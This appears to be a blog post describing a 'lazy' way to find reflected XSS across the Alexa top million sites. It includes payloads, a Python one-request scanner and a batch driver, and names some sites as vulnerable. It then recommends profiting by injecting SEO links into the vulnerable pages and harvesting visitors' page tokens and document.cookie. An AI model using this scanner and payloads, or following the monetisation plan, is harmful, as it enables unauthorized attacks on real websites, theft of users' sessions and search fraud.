So you either look for XSS on a major website, or collect tons of random XSSes and hope some of them turn out to be useful.
What is a lazy technique? One where a single GET request is enough to check whether there's an XSS. Here are the lazy techniques I have in mind:
- Developers don't spend much time on 404 pages, so there's a >0% chance a 404 page reflects unescaped input. The script above simply GETs sitename.com/<img src=yolo onerror=alert(0)> and checks whether the response body contains the payload. Easy, right?
- There are also 5xx errors; try playing with HTTP Parameter Pollution (x=1&x[hash]=1).
- Don't forget about the 414 error (send a super long payload).
- site.com/#<img src=x> for pages doing $(location.hash) might work too, but you need to catch the alert execution at runtime (e.g. in a headless browser), since the fragment never reaches the server.
- Please share other lazy tricks you know!
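The one-GET 404 trick can be sketched in a few lines of Python. This is a hypothetical re-implementation, not the original script: `PAYLOAD`, `reflects_payload`, and `check_404_xss` are my own names, and the assumption is that the server URL-decodes the path before reflecting it into the error page.

```python
# Lazy 404 XSS check: one GET per site, flag the site if the payload
# comes back unescaped in the response body.
import urllib.error
import urllib.parse
import urllib.request

PAYLOAD = '<img src=yolo onerror=alert(0)>'

def reflects_payload(body: str) -> bool:
    # Unescaped reflection means the raw tag survives in the HTML;
    # an escaping 404 page would contain &lt;img ... instead.
    return PAYLOAD in body

def check_404_xss(host: str, timeout: float = 5.0) -> bool:
    # Percent-encode the payload so the URL is well-formed; most servers
    # decode the path before echoing it into the error page (assumption).
    path = urllib.parse.quote(PAYLOAD)
    url = 'http://{}/{}'.format(host, path)
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = resp.read().decode('utf-8', 'replace')
    except urllib.error.HTTPError as e:
        # 404/414/5xx responses still carry bodies worth checking --
        # that is the whole point of the trick.
        body = e.read().decode('utf-8', 'replace')
    except Exception:
        return False
    return reflects_payload(body)
```

Note this only catches server-side reflection; the location.hash variant from the list needs a real JS runtime to observe.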
So I took the first 1k of Alexa and apparently 10+ are vulnerable (wikia, rottentomatoes etc). The script is not perfect (it doesn't check the body when the status code is 404), so feel free to improve it. Extrapolating to the full 1,000,000, the output might be 10k+ vulnerable websites with PR greater than 1. PROFITZ.
Here you can grab the Alexa top 1,000,000 as a CSV
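Scaling the check over that CSV is just a loop. A hypothetical driver (my own sketch: the `check` callable stands in for the one-request probe described above, and the CSV is assumed to be `rank,domain` per row, which is how Alexa ships it):

```python
# Hypothetical batch scanner over the Alexa CSV (rank,domain rows).
import csv

def scan_alexa(rows, check, limit=1000):
    """rows: an open CSV file or any iterable of 'rank,domain' lines.
    check: function taking a domain, returning True if it reflects
    the payload (e.g. the one-GET 404 probe).
    Returns the list of apparently vulnerable domains."""
    hits = []
    for rank, domain in csv.reader(rows):
        if int(rank) > limit:
            break  # only scan the top `limit` sites
        if check(domain):
            hits.append(domain)
    return hits
```

With `limit=1000` and the 404 probe plugged in as `check`, this reproduces the top-1k run from the post.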
And make some money. For (black) SEO purposes you can make the Google bot visit popular-website.com/<a href=//yoursite.com>GOOD</a> and so on.
You can also send some cheap human traffic to the XSSed pages and dump the page (with the tokens in it) plus document.cookie to analyse / data-mine later, hoping to find something useful.
So the recipe is simple: take that 1 million, create a lazy XSS pattern (consider more comprehensive patterns too, e.g. ?redirect_to=..), then use the XSSed pages for SEO / stealing cookies.
A completely hassle-free way to find bugs. Oh, and also check out the Sakurity Hustlers - Bug Hunters Top.